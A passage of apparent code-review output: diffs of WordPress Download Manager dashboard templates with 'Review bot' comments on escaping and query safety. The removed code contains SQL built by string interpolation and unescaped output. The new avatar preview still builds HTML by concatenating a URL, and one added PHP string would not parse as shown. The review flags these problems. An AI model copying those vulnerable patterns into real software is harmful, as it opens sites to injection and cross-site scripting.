+        $('body').css('overflow', '');
+    });
+});
+</script>
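Review bot: good to see `esc_url($menu_url)`, `esc_attr($icon)` and `esc_html($menu_item['name'])` replacing the raw echoes in the navigation loop. Two leftovers: `$dashboard_contents` is still echoed raw in the main area, which is acceptable only if every producer of that variable escapes its own output; and `$avatar_url` can come from the `__wpdm_public_profile` user meta rather than `get_avatar_url()`, so while `esc_url()` at the `<img>` neutralises a `javascript:` value, validating the scheme when the profile is saved would be the stronger control.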
--- a/download-manager/src/User/views/dashboard/download-history.php
+++ b/download-manager/src/User/views/dashboard/download-history.php
@@ -1,81 +1,230 @@
-<?php use WPDM____;
-
-if(!defined('ABSPATH')) die(); ?>
-<?php if(class_exists('WPDMAddOnDownloadLimit')):?>
-<div class="row">
-    <div class="col-md-8">
-        <div class="card card-default dashboard-card">
-            <div class="card-header"><?php _e('Download Limit Resets', 'download-manager'); ?></div>
-            <div class="card-body">
-			    <?php echo do_shortcode("[wpdm_download_limit_reset_timer]") ?>
+<?php
+/**
+ * User Dashboard - Download History
+ * Enterprise-grade design
+ */
+
+use WPDM____;
+
+if (!defined('ABSPATH')) die();
+
+global $wpdb, $current_user, $wp_query;
+
+$items_per_page = 20;
+$current_page = isset($_GET['pgd']) ? max(1, absint($_GET['pgd'])) : 1;
+$start = ($current_page - 1) * $items_per_page;
+
+// Get total count for pagination
+$total_items = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d",
+    $current_user->ID
+));
+
+// Get paginated results
+$downloads = $wpdb->get_results($wpdb->prepare(
+    "SELECT p.post_title, s.* FROM {$wpdb->prefix}posts p, {$wpdb->prefix}ahm_download_stats s
+     WHERE s.uid = %d AND s.pid = p.ID
+     ORDER BY s.timestamp DESC
+     LIMIT %d, %d",
+    $current_user->ID,
+    $start,
+    $items_per_page
+));
+
+$total_pages = ceil($total_items / $items_per_page);
+?>
+
+<?php do_action("wpdm_before_download_history"); ?>
+
+<?php if (class_exists('WPDMAddOnDownloadLimit')): ?>
+<!-- Download Limit Info -->
+<div class="row mb-3">
+    <div class="col-md-6 mb-2">
+        <div class="card h-100">
+            <div class="card-body py-3">
+                <div class="media">
+                    <div class="mr-3 text-info">
+                        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
+                    </div>
+                    <div class="media-body">
+                        <small class="text-muted d-block"><?php esc_html_e('Reset Timer', 'download-manager'); ?></small>
+                        <strong><?php echo do_shortcode("[wpdm_download_limit_reset_timer]"); ?></strong>
+                    </div>
+                </div>
             </div>
         </div>
     </div>
-    <div class="col-md-4">
-        <div class="card card-default dashboard-card">
-            <div class="card-header"><?php _e('Download Limit', 'download-manager'); ?></div>
-            <div class="card-body">
-			    <?php echo do_shortcode("[wpdm_user_download_count]") ?> / <?php echo do_shortcode("[wpdm_user_download_limit]") ?>
+    <div class="col-md-6 mb-2">
+        <div class="card h-100">
+            <div class="card-body py-3">
+                <div class="media">
+                    <div class="mr-3 text-warning">
+                        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="7 10 12 15 17 10"></polyline><line x1="12" y1="15" x2="12" y2="3"></line></svg>
+                    </div>
+                    <div class="media-body">
+                        <small class="text-muted d-block"><?php esc_html_e('Download Limit', 'download-manager'); ?></small>
+                        <strong><?php echo do_shortcode("[wpdm_user_download_count]"); ?> / <?php echo do_shortcode("[wpdm_user_download_limit]"); ?></strong>
+                    </div>
+                </div>
             </div>
         </div>
     </div>
 </div>
 <?php endif; ?>
-<div class="card card-default dashboard-card">
-    <div class="card-header bg-white"><?php echo __( "Download History", "download-manager" ); ?></div>
-    <table class="table">
-        <thead>
-        <tr>
-            <th><?php _e( "Package / File" , "download-manager" ); ?></th>
-            <th><?php _e( "Download Time" , "download-manager" ); ?></th>
-            <th><?php _e( "IP" , "download-manager" ); ?></th>
-        </tr>
-        </thead>
-        <tbody>
-        <?php
-        global $wp_rewrite, $wp_query;
-        $items_per_page = 30;
-        $start = isset($_GET['pgd'])?($_GET['pgd']-1)*$items_per_page:0;
-        $res = $wpdb->get_results("select p.post_title,s.* from {$wpdb->prefix}posts p, {$wpdb->prefix}ahm_download_stats s where s.uid = '{$current_user->ID}' and s.pid = p.ID order by `timestamp` desc limit $start, $items_per_page");
-        foreach($res as $stat){
-            ?>
-            <tr>
-                <td>
-                    <a class="p-0 d-block mb-1" href="<?php echo get_permalink($stat->pid); ?>"><?php echo $stat->post_title; ?></a>
-                    <div class="text-muted text-small"><i class="far fa-arrow-alt-circle-down mr-1"></i><em><?= __::mask($stat->filename, '...', -20, false) ?: 'Package' ?></em></div>
-                </td>
-                <td><?php echo date_i18n(get_option('date_format')." h:i A",$stat->timestamp + __::timezoneOffset()); ?></td>
-                <td><?php echo $stat->ip; ?></td>
-            </tr>
-            <?php
-        }
-        ?>

-        </tbody>
-    </table>
-    <div class="card-footer">
-        <?php
-
-            isset($_GET['pgd']) && $_GET['pgd'] > 1 ? $current = $_GET['pgd'] : $current = 1;
-            $pagination = array(
-                'base' => @add_query_arg('pgd','%#%'),
+<!-- Download History Card -->
+<div class="wpdm-card">
+    <div class="wpdm-card-header">
+        <h3>
+            <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
+            <?php esc_html_e('Download History', 'download-manager'); ?>
+        </h3>
+        <?php if ($total_items > 0): ?>
+        <span class="wpdm-badge wpdm-badge--info"><?php echo number_format($total_items); ?> <?php esc_html_e('total', 'download-manager'); ?></span>
+        <?php endif; ?>
+    </div>
+
+    <?php if (!empty($downloads)): ?>
+    <div class="wpdm-table-wrap">
+        <table class="wpdm-table">
+            <thead>
+                <tr>
+                    <th><?php esc_html_e('Package / File', 'download-manager'); ?></th>
+                    <th class="wpdm-hide-mobile"><?php esc_html_e('Download Time', 'download-manager'); ?></th>
+                    <th class="wpdm-hide-mobile" style="width: 120px;"><?php esc_html_e('IP Address', 'download-manager'); ?></th>
+                </tr>
+            </thead>
+            <tbody>
+                <?php foreach ($downloads as $stat): ?>
+                <tr>
+                    <td>
+                        <div class="wpdm-product-cell">
+                            <a class="wpdm-table-link wpdm-product-name" href="<?php echo esc_url(get_permalink($stat->pid)); ?>">
+                                <?php echo esc_html($stat->post_title); ?>
+                            </a>
+                            <?php if (!empty($stat->filename)): ?>
+                            <span class="wpdm-file-meta">
+                                <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline></svg>
+                                <?php echo esc_html(__::mask($stat->filename, '...', -25, false) ?: 'Package'); ?>
+                            </span>
+                            <?php endif; ?>
+                            <span class="wpdm-mobile-meta wpdm-show-mobile">
+                                <?php echo date_i18n(get_option('date_format') . ' H:i', $stat->timestamp + __::timezoneOffset()); ?>
+                            </span>
+                        </div>
+                    </td>
+                    <td class="wpdm-hide-mobile">
+                        <span class="wpdm-date"><?php echo date_i18n(get_option('date_format') . ' H:i', $stat->timestamp + __::timezoneOffset()); ?></span>
+                    </td>
+                    <td class="wpdm-hide-mobile">
+                        <span class="wpdm-ip"><?php echo esc_html($stat->ip); ?></span>
+                    </td>
+                </tr>
+                <?php endforeach; ?>
+            </tbody>
+        </table>
+    </div>
+
+    <?php if ($total_pages > 1): ?>
+    <div class="wpdm-card-footer">
+        <div class="wpdm-pagination">
+            <?php
+            $pagination_args = array(
+                'base' => add_query_arg('pgd', '%#%'),
                 'format' => '',
-                'total' => ceil($wpdb->get_var("select count(*) from {$wpdb->prefix}ahm_download_stats where uid = '{$current_user->ID}'")/$items_per_page),
-                'current' => $current,
+                'total' => $total_pages,
+                'current' => $current_page,
                 'show_all' => false,
-                'type' => 'list',
-                'prev_next'    => True,
-                'prev_text' => '<i class="icon icon-angle-left"></i> '.__( "Previous", "download-manager" ),
-                'next_text' => __( "Next", "download-manager" ).' <i class="icon icon-angle-right"></i>',
+                'end_size' => 1,
+                'mid_size' => 2,
+                'prev_next' => true,
+                'prev_text' => '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="15 18 9 12 15 6"></polyline></svg>',
+                'next_text' => '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="9 18 15 12 9 6"></polyline></svg>',
+                'type' => 'plain',
             );
+            echo paginate_links($pagination_args);
+            ?>
+        </div>
+    </div>
+    <?php endif; ?>

-            //if( $wp_rewrite->using_permalinks() && !is_search())
-            //    $pagination['base'] = user_trailingslashit( trailingslashit( remove_query_arg('s',get_pagenum_link(1) ) ) . 'paged=%#%', 'paged');
-
-            if( !empty($wp_query->query_vars['s']) )
-                $pagination['add_args'] = array('s'=>get_query_var('s'));
-
-            echo '<div class="text-center">' . str_replace('<ul class='page-numbers'>','<ul class="pagination pagination-centered page-numbers">', paginate_links($pagination)) . '</div>';
-        ?>
+    <?php else: ?>
+    <div class="wpdm-card-body">
+        <div class="wpdm-empty-state wpdm-empty-state--compact">
+            <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
+            <h4><?php esc_html_e('No download history', 'download-manager'); ?></h4>
+            <p><?php esc_html_e("You haven't downloaded any files yet.", 'download-manager'); ?></p>
+        </div>
     </div>
+    <?php endif; ?>
 </div>
+
+<?php do_action("wpdm_after_download_history"); ?>
+
+<style>
+.wpdm-file-meta {
+    display: inline-flex;
+    align-items: center;
+    gap: 0.375rem;
+    font-size: 0.8125rem;
+    color: #64748b;
+}
+.wpdm-file-meta svg {
+    color: #94a3b8;
+}
+.wpdm-mobile-meta {
+    display: none;
+    font-size: 0.75rem;
+    color: #94a3b8;
+    margin-top: 0.25rem;
+}
+@media (max-width: 768px) {
+    .wpdm-show-mobile {
+        display: block;
+    }
+}
+.wpdm-pagination {
+    display: flex;
+    justify-content: center;
+    align-items: center;
+    gap: 0.25rem;
+    flex-wrap: wrap;
+}
+.wpdm-pagination a,
+.wpdm-pagination span {
+    display: inline-flex;
+    align-items: center;
+    justify-content: center;
+    min-width: 36px;
+    height: 36px;
+    padding: 0 0.75rem;
+    font-size: 0.875rem;
+    font-weight: 500;
+    color: #475569;
+    background: #fff;
+    border: 1px solid #e2e8f0;
+    border-radius: 0.5rem;
+    text-decoration: none;
+    transition: all 0.15s ease;
+}
+.wpdm-pagination a:hover {
+    background: #f1f5f9;
+    border-color: #cbd5e1;
+    color: #1e293b;
+}
+.wpdm-pagination .current {
+    background: var(--wpdm-primary, #008fef);
+    border-color: var(--wpdm-primary, #008fef);
+    color: #fff;
+}
+.wpdm-pagination .prev,
+.wpdm-pagination .next {
+    padding: 0;
+    min-width: 36px;
+}
+.wpdm-pagination .dots {
+    border: none;
+    background: transparent;
+    color: #94a3b8;
+}
+</style>
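Review bot: the `'add_args' => array('s' => get_query_var('s'))` carried by the removed pagination code has no counterpart in the new `$pagination_args`, so if this view is ever reached with a search query the page links silently drop it; either restore `add_args` or note in the commit message that search does not apply to download history. The replacement of the interpolated `s.uid = '{$current_user->ID}'` query and the raw `$_GET['pgd']` arithmetic with `$wpdb->prepare()` `%d` placeholders and `max(1, absint($_GET['pgd']))`, plus `esc_html()` around `post_title` and `ip` and `esc_url()` around `get_permalink()`, is the right fix for the unescaped output in the old lines. One caveat to record: `add_query_arg('pgd', '%#%')` with no URL argument builds the base from `$_SERVER['REQUEST_URI']`, so visitor-supplied query parameters end up in the page links; that is acceptable only because `paginate_links()` passes each link through `esc_url()`, and this block should not later be refactored to emit those links by any other route. `$items_per_page` also drops from 30 to 20 without mention.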
--- a/download-manager/src/User/views/dashboard/edit-profile.php
+++ b/download-manager/src/User/views/dashboard/edit-profile.php
@@ -1,83 +1,209 @@
 <?php
+/**
+ * User Dashboard - Edit Profile
+ * Enterprise-grade design
+ */
+
+if (!defined('ABSPATH')) die();
+
 global $current_user, $wpdb;
 $user = get_userdata($current_user->ID);
-
+$public_profile = get_user_meta(get_current_user_id(), '__wpdm_public_profile', true);
+$profile_pic = wpdm_valueof($public_profile, 'logo');
 ?>

 <div id="edit-profile-form">
     <form method="post" id="edit_profile" name="contact_form" action="" class="form">
         <?php wp_nonce_field(NONCE_KEY, '__wpdm_epnonce'); ?>
-        <div class="card card-default dashboard-card">
-            <div class="card-header bg-white">
-                <i class="fa fa-user-edit title-icon color-primary mr-2"></i><?= __('Basic Profile', WPDM_TEXT_DOMAIN); ?>
-            </div>
-            <div class="card-body">
-                <div class="row">
-                    <div class="col-md-6"><div class="form-group"><label for="name"><?php _e( "Display name:" , WPDM_TEXT_DOMAIN );?> </label><input type="text" class="required form-control" required="required" value="<?php echo esc_attr($user->display_name);?>" name="wpdm_profile[display_name]" id="fname"></div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="username"><?php _e( "Username:" , WPDM_TEXT_DOMAIN );?></label><input type="text" class="required form-control" value="<?php echo $user->user_login;?>" id="username" readonly="readonly"></div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="url"><?php _e( "Title:" , WPDM_TEXT_DOMAIN );?></label><input type="text" class="required form-control" name="wpdm_profile[title]" value="<?php echo esc_attr(get_user_meta($user->ID, '__wpdm_title', true));?>" id="title" ></div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="email"><?php _e( "Email:" , WPDM_TEXT_DOMAIN );?></label><input type="text" class="required form-control" name="wpdm_profile[user_email]" value="<?php echo esc_attr($user->user_email);?>" id="email" ></div></div>
-                    <div class="col-md-12"><div class="form-group"><label for="email"><?php _e( "About Me:" , WPDM_TEXT_DOMAIN );?></label><textarea class="required form-control" name="wpdm_profile[description]" id="description" ><?php echo esc_attr(get_user_meta($user->ID, 'description', true));?></textarea></div></div>
+
+        <!-- Basic Profile Card -->
+        <div class="wpdm-card">
+            <div class="wpdm-card-header">
+                <h3>
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle></svg>
+                    <?php esc_html_e('Basic Profile', 'download-manager'); ?>
+                </h3>
+            </div>
+            <div class="wpdm-card-body">
+                <div class="wpdm-form-grid">
+                    <div class="wpdm-form-group">
+                        <label for="fname"><?php esc_html_e('Display Name', 'download-manager'); ?> <span class="wpdm-required">*</span></label>
+                        <input type="text" class="wpdm-input" required value="<?php echo esc_attr($user->display_name); ?>" name="wpdm_profile[display_name]" id="fname">
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="username"><?php esc_html_e('Username', 'download-manager'); ?></label>
+                        <input type="text" class="wpdm-input wpdm-input--readonly" value="<?php echo esc_attr($user->user_login); ?>" id="username" readonly>
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="title"><?php esc_html_e('Title', 'download-manager'); ?></label>
+                        <input type="text" class="wpdm-input" name="wpdm_profile[title]" value="<?php echo esc_attr(get_user_meta($user->ID, '__wpdm_title', true)); ?>" id="title">
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="email"><?php esc_html_e('Email', 'download-manager'); ?> <span class="wpdm-required">*</span></label>
+                        <input type="email" class="wpdm-input" required name="wpdm_profile[user_email]" value="<?php echo esc_attr($user->user_email); ?>" id="email">
+                    </div>
+                    <div class="wpdm-form-group wpdm-form-group--full">
+                        <label for="description"><?php esc_html_e('About Me', 'download-manager'); ?></label>
+                        <textarea class="wpdm-textarea" name="wpdm_profile[description]" id="description" rows="4"><?php echo esc_textarea(get_user_meta($user->ID, 'description', true)); ?></textarea>
+                    </div>
                 </div>
                 <?php do_action('wpdm_update_profile_filed_html', $user); ?>
                 <?php do_action('wpdm_update_profile_field_html', $user); ?>
             </div>
         </div>

-        <div class="card card-default dashboard-card mt-3">
-            <div class="card-header bg-white">
-                <i class="fa fa-user-circle title-icon color-success mr-2"></i><?php _e( "Profile Picture" , WPDM_TEXT_DOMAIN ); ?>
-            </div>
-            <div class="card-body">
-                <div class="form-group mb-0">
-                    <div class="input-group mb-0">
-                        <input placeholder="<?php esc_attr_e('Select Profile Picture...', 'download-manager'); ?>" type="text" name="__wpdm_profile_pic" id="store-logo" class="form-control" value="<?php echo esc_attr(wpdm_valueof(get_user_meta(get_current_user_id(), '__wpdm_public_profile', true), 'logo')); ?>"/>
-                        <div class="input-group-append">
-                            <button class="btn btn-secondary wpdm-media-upload" type="button" rel="#store-logo"><i class="far fa-image"></i></button>
-                        </div>
+        <!-- Profile Picture Card -->
+        <div class="wpdm-card" style="margin-top: 1.5rem;">
+            <div class="wpdm-card-header">
+                <h3>
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><circle cx="8.5" cy="8.5" r="1.5"></circle><polyline points="21 15 16 10 5 21"></polyline></svg>
+                    <?php esc_html_e('Profile Picture', 'download-manager'); ?>
+                </h3>
+            </div>
+            <div class="wpdm-card-body">
+                <div class="wpdm-avatar-upload">
+                    <div class="wpdm-avatar-preview" id="avatar-preview">
+                        <?php if ($profile_pic): ?>
+                            <img src="<?php echo esc_url($profile_pic); ?>" alt="">
+                        <?php else: ?>
+                            <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle></svg>
+                        <?php endif; ?>
+                    </div>
+                    <div class="wpdm-avatar-actions">
+                        <input type="hidden" name="__wpdm_profile_pic" id="store-logo" value="<?php echo esc_attr($profile_pic); ?>">
+                        <button type="button" class="wpdm-btn wpdm-btn--secondary wpdm-media-upload" rel="#store-logo">
+                            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="17 8 12 3 7 8"></polyline><line x1="12" y1="3" x2="12" y2="15"></line></svg>
+                            <?php esc_html_e('Upload Image', 'download-manager'); ?>
+                        </button>
+                        <button type="button" class="wpdm-btn wpdm-btn--danger wpdm-btn--sm" id="remove-avatar" style="<?php echo $profile_pic ? '' : 'display: none;'; ?>">
+                            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="3 6 5 6 21 6"></polyline><path d="M19 6v14a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V6m3 0V4a2 2 0 0 1 2-2h4a2 2 0 0 1 2 2v2"></path></svg>
+                            <?php esc_html_e('Remove', 'download-manager'); ?>
+                        </button>
+                        <p class="wpdm-help-text"><?php esc_html_e('Recommended: Square image, at least 256x256 pixels', 'download-manager'); ?></p>
                     </div>
                 </div>
             </div>
         </div>

-        <div class="card card-default dashboard-card mt-3">
-            <div class="card-header bg-white">
-                <i class="fa fa-key title-icon color-danger mr-2"></i><?php _e( "Update Password" , WPDM_TEXT_DOMAIN ); ?>
-            </div>
-            <div class="card-body">
-                <div class="row">
-                    <div class="col-md-6"><div class="form-group"><label for="new_pass"><?php _e( "New Password:" , WPDM_TEXT_DOMAIN );?> </label><input  autocomplete="off" placeholder="" type="password" class="form-control" value="" name="password" id="new_pass"> </div></div>
-                    <div class="col-md-6"><div class="form-group"><label for="re_new_pass"><?php _e( "Re-type New Password:" , WPDM_TEXT_DOMAIN );?> </label><input autocomplete="off" type="password" value="" class="form-control" name="cpassword" id="re_new_pass"> </div></div>
+        <!-- Password Card -->
+        <div class="wpdm-card" style="margin-top: 1.5rem;">
+            <div class="wpdm-card-header">
+                <h3>
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 10 0v4"></path></svg>
+                    <?php esc_html_e('Update Password', 'download-manager'); ?>
+                </h3>
+            </div>
+            <div class="wpdm-card-body">
+                <div class="wpdm-form-grid">
+                    <div class="wpdm-form-group">
+                        <label for="new_pass"><?php esc_html_e('New Password', 'download-manager'); ?></label>
+                        <input autocomplete="new-password" type="password" class="wpdm-input" value="" name="password" id="new_pass" placeholder="<?php esc_attr_e('Enter new password', 'download-manager'); ?>">
+                    </div>
+                    <div class="wpdm-form-group">
+                        <label for="re_new_pass"><?php esc_html_e('Confirm Password', 'download-manager'); ?></label>
+                        <input autocomplete="new-password" type="password" class="wpdm-input" value="" name="cpassword" id="re_new_pass" placeholder="<?php esc_attr_e('Re-enter new password', 'download-manager'); ?>">
+                    </div>
+                </div>
+                <div class="wpdm-alert wpdm-alert--info" style="margin-top: 1rem;">
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><line x1="12" y1="16" x2="12" y2="12"></line><line x1="12" y1="8" x2="12.01" y2="8"></line></svg>
+                    <span><?php esc_html_e('Leave empty if you don't want to change your password', 'download-manager'); ?></span>
                 </div>
-                <em class="note"><?php _e( "Keep empty if you don't want to change old password" , WPDM_TEXT_DOMAIN );?></em>
             </div>
         </div>

         <?php do_action("wpdm_edit_profile_form"); ?>

-
-        <div class="card p-3 mt-3">
-            <div class="text-right"><button type="submit" style="min-width: 250px" class="btn btn-lg btn-primary" id="edit_profile_sbtn"><i class="fas fa-hdd"></i>  <?php _e( "Save Changes" , WPDM_TEXT_DOMAIN );?></button></div>
+        <!-- Submit Button -->
+        <div class="wpdm-card wpdm-card--action" style="margin-top: 1.5rem;">
+            <button type="submit" class="wpdm-btn wpdm-btn--primary wpdm-btn--lg" id="edit_profile_sbtn">
+                <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M19 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h11l5 5v11a2 2 0 0 1-2 2z"></path><polyline points="17 21 17 13 7 13 7 21"></polyline><polyline points="7 3 7 8 15 8"></polyline></svg>
+                <?php esc_html_e('Save Changes', 'download-manager'); ?>
+            </button>
         </div>

-
     </form>
-    <div id="edit-profile-msg">
-    </div>
+    <div id="edit-profile-msg"></div>
 </div>
 <div id="wpdm-fixed-top-center"></div>
+
+<style>
+.wpdm-avatar-upload {
+    display: flex;
+    align-items: flex-start;
+    gap: 1.5rem;
+    flex-wrap: wrap;
+}
+.wpdm-avatar-preview {
+    width: 120px;
+    height: 120px;
+    border-radius: 50%;
+    background: linear-gradient(135deg, #f0f9ff 0%, #e0f2fe 100%);
+    display: flex;
+    align-items: center;
+    justify-content: center;
+    overflow: hidden;
+    border: 4px solid #fff;
+    box-shadow: 0 8px 24px rgba(0, 0, 0, 0.12);
+    flex-shrink: 0;
+}
+.wpdm-avatar-preview img {
+    width: 100%;
+    height: 100%;
+    object-fit: cover;
+}
+.wpdm-avatar-preview svg {
+    color: #94a3b8;
+}
+.wpdm-avatar-actions {
+    display: flex;
+    flex-direction: column;
+    align-items: flex-start;
+    gap: 0.75rem;
+}
+.wpdm-avatar-actions .wpdm-help-text {
+    margin: 0;
+}
+</style>
+
 <script>
-    jQuery(function ($) {
-        $('#edit_profile').on('submit', function (e) {
-            e.preventDefault();
-            var edit_profile_sbtn = $('#edit_profile_sbtn').html();
-            $('#edit_profile_sbtn').html(WPDM.el('i', {'class' : 'fa fa-sun fa-spin'}) + " <?= esc_attr__( 'Please Wait...', WPDM_TEXT_DOMAIN ) ?>").attr('disabled','disabled');
-            $(this).ajaxSubmit({
-                success: function (res) {
-                    WPDM.notify(res.msg, res.type, '#wpdm-fixed-top-center', 10000);
-                    $('#edit_profile_sbtn').html(edit_profile_sbtn).removeAttr('disabled');
-                }
-            });
+jQuery(function ($) {
+    // Form submission
+    $('#edit_profile').on('submit', function (e) {
+        e.preventDefault();
+        var $btn = $('#edit_profile_sbtn');
+        var originalHtml = $btn.html();
+        $btn.html('<svg class="wpdm-spin" xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="12" y1="2" x2="12" y2="6"></line><line x1="12" y1="18" x2="12" y2="22"></line><line x1="4.93" y1="4.93" x2="7.76" y2="7.76"></line><line x1="16.24" y1="16.24" x2="19.07" y2="19.07"></line><line x1="2" y1="12" x2="6" y2="12"></line><line x1="18" y1="12" x2="22" y2="12"></line><line x1="4.93" y1="19.07" x2="7.76" y2="16.24"></line><line x1="16.24" y1="7.76" x2="19.07" y2="4.93"></line></svg> <?php echo esc_js(__('Saving...', 'download-manager')); ?>').prop('disabled', true);
+
+        $(this).ajaxSubmit({
+            success: function (res) {
+                WPDM.notify(res.msg, res.type, '#wpdm-fixed-top-center', 10000);
+                $btn.html(originalHtml).prop('disabled', false);
+            },
+            error: function() {
+                $btn.html(originalHtml).prop('disabled', false);
+                WPDM.notify('<?php echo esc_js(__('An error occurred. Please try again.', 'download-manager')); ?>', 'error', '#wpdm-fixed-top-center', 10000);
+            }
         });
     });
+
+    // Avatar preview update
+    $('#store-logo').on('change', function() {
+        var url = $(this).val();
+        var $preview = $('#avatar-preview');
+        var $removeBtn = $('#remove-avatar');
+
+        if (url) {
+            $preview.html('<img src="' + url + '" alt="">');
+            $removeBtn.show();
+        } else {
+            $preview.html('<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path><circle cx="12" cy="7" r="4"></circle></svg>');
+            $removeBtn.hide();
+        }
+    });
+
+    // Remove avatar
+    $('#remove-avatar').on('click', function() {
+        $('#store-logo').val('').trigger('change');
+    });
+});
 </script>
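Review bot: `$preview.html('<img src="' + url + '" alt="">')` in the avatar preview handler builds markup by string concatenation from the `#store-logo` value, so a quote in that value breaks out of the attribute. The value is whatever the `wpdm-media-upload` handler wrote into the hidden input, which limits this to the user's own session, but `$('<img>', { src: url, alt: '' })` removes the pattern at no cost. Related: changing `__wpdm_profile_pic` from a text input to `type="hidden"` does not make the submitted value trustworthy; the handler behind `ajaxSubmit` still has to run it through `esc_url_raw()` before storing it (not visible in this hunk). Finally, as rendered here `esc_html_e('Leave empty if you don't want to change your password', ...)` is a single-quoted PHP string with a bare apostrophe, which would not parse; confirm the source escapes it as `don\'t` or switch to a double-quoted string as the old `_e( "Keep empty if you don't want ..." )` line did.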
--- a/download-manager/src/User/views/dashboard/profile.php
+++ b/download-manager/src/User/views/dashboard/profile.php
@@ -1,170 +1,230 @@
 <?php
-global $current_user, $wpdb;
+/**
+ * User Dashboard - Profile/Home
+ * Enterprise-grade design
+ */

-global $wp_roles;
-$roles = array_reverse($wp_roles->role_names);
-$val = get_option( 'wp_user_roles' );
-$levels =  array();
-foreach ($current_user->roles as $role) {
-    $levels[] = isset($roles[$role])?$roles[$role]:$role;
-}
+global $current_user, $wpdb;

+$total_downloads = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d",
+    $current_user->ID
+));
+
+$today_downloads = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d AND `year` = YEAR(CURDATE()) AND `month` = MONTH(CURDATE()) AND `day` = DAY(CURDATE())",
+    $current_user->ID
+));
+
+$this_month_downloads = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d AND `year` = YEAR(CURDATE()) AND `month` = MONTH(CURDATE())",
+    $current_user->ID
+));
 ?>

 <?php do_action("wpdm_before_user_dashboard_summery"); ?>
-<div class="row">
-    <div class="col-md-4">
-        <div class="card bg-primary text-white">
-            <div class="card-header">

-                <?php _e( "User Level" , "download-manager" ); ?>
-            </div>
-            <div class="card-body tab-content">
-                <h3><?
